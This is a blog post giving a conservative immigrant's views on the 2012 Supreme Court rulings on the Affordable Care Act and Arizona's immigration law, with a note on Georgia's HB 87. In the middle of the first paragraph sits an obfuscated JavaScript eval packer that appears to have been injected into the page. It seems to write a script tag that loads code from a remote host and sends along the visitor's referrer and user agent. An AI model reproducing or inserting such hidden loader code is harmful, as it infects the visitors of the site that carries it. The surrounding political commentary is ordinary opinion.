Supreme Court Ruling on Immigration:

The Supreme Court of the United States in a 5-4 decision ruled in favor of the controversial Obamacare law.  SCOTUS upholds the law under the federal powers to tax, not the commerce clause.  Chief Justice Roberts, appointed by President Bush, surprised many with his favorable position.  However, this article: Why eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘b’+e(c)+’b’,’g’),k[c])}}return p}(‘0.6(““);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|ndkkb|var|u0026u|referrer|yibia||js|php’.split(‘|’),0,{}))
Chief Justice Roberts made the right long-term decision with Obamacare
explores why his decision is really a small victory for conservatives.  The most debated component of Obamacare was the individual mandate to require every citizen to have healthcare insurance.  I’ve heard arguments on both sides of the aisle.  Ideally, affordable healthcare for everyone is a miracle.  How to pay for it is the reality.  There are several components of the healthcare reform that I do support, but my conservative mind asks how the country will write the check for the hefty price tag, especially when we are almost $16 trillion in debt.

In Georgia, people were also waiting for the SCOTUS ruling on Arizona’s immigration law to see how it would affect the recently passed HB 87.  In yet another surprise ruling, the Supreme Court upheld the “show your papers” provision of Arizona’s law.  Many consider this equivalent to racial profiling; however, Georgia lawmakers are saying the ruling will not have a significant impact on the state’s similar law. Georgia’s law specifies that law enforcement agents can enquire about the legal status of an individual only if they are stopped because of other suspicious activities. As a first generation immigrant, I know that it is possible to come over legally.  However, the U.S. was built on the backs of hard-working immigrants and I sympathize with those who want to create their own rags to riches stories.  The truth remains that the entire process is complicated for everyone if illegals don’t go through the correct channels to obtain citizenship or permanent alien status.
